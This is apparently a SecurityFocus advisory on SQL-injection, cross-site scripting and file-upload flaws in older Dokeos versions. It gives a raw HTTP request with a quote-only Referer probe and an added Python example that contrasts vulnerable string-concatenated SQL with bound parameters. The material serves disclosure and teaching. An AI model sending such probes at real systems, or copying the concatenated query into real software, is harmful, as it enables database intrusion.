source: https://www.securityfocus.com/bid/27792/info

Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue.

Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to Dokeos 1.8.4 SP2 are affected.

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '
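
Added example, not part of the advisory and not Dokeos code: assuming the lone quote in the Referer header reaches a SQL statement built by string concatenation (the page does not say which of the listed issues this request triggers), the sketch below parses the request and contrasts a concatenated insert with a bound-parameter one. The `track_referer` table and all function names are hypothetical.

```python
import sqlite3

# Constructed copy of the request shown above (Referer carries a lone quote).
RAW_REQUEST = (
    "GET /dokeos/index.php HTTP/1.0\r\n"
    "Cookie: dk_sid=av68g9lus300ts870iqebhneh5\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\r\n"
    "Host: localhost\r\n"
    "Referer: '\r\n"
    "\r\n"
)

def parse_headers(raw):
    """Return the request headers as a dict keyed by lower-cased name."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def new_db():
    # Hypothetical tracking table for illustration; not the Dokeos schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE track_referer (referer TEXT)")
    return db

def log_referer_concat(db, referer):
    """'Before' form: header text is spliced into the SQL string."""
    try:
        db.execute("INSERT INTO track_referer (referer) VALUES ('" + referer + "')")
        return "stored"
    except sqlite3.Error as exc:
        return "sql error: %s" % exc

def log_referer_bound(db, referer):
    """Hardened form: the header travels as a bound parameter, never as SQL."""
    db.execute("INSERT INTO track_referer (referer) VALUES (?)", (referer,))
    return db.execute("SELECT referer FROM track_referer").fetchall()

if __name__ == "__main__":
    referer = parse_headers(RAW_REQUEST)["referer"]
    print(log_referer_concat(new_db(), referer))
    print(log_referer_bound(new_db(), referer))
```

A database error on a quote-only header value is the signal that request headers are being treated as SQL text; with the bound form the same value is stored as ordinary data.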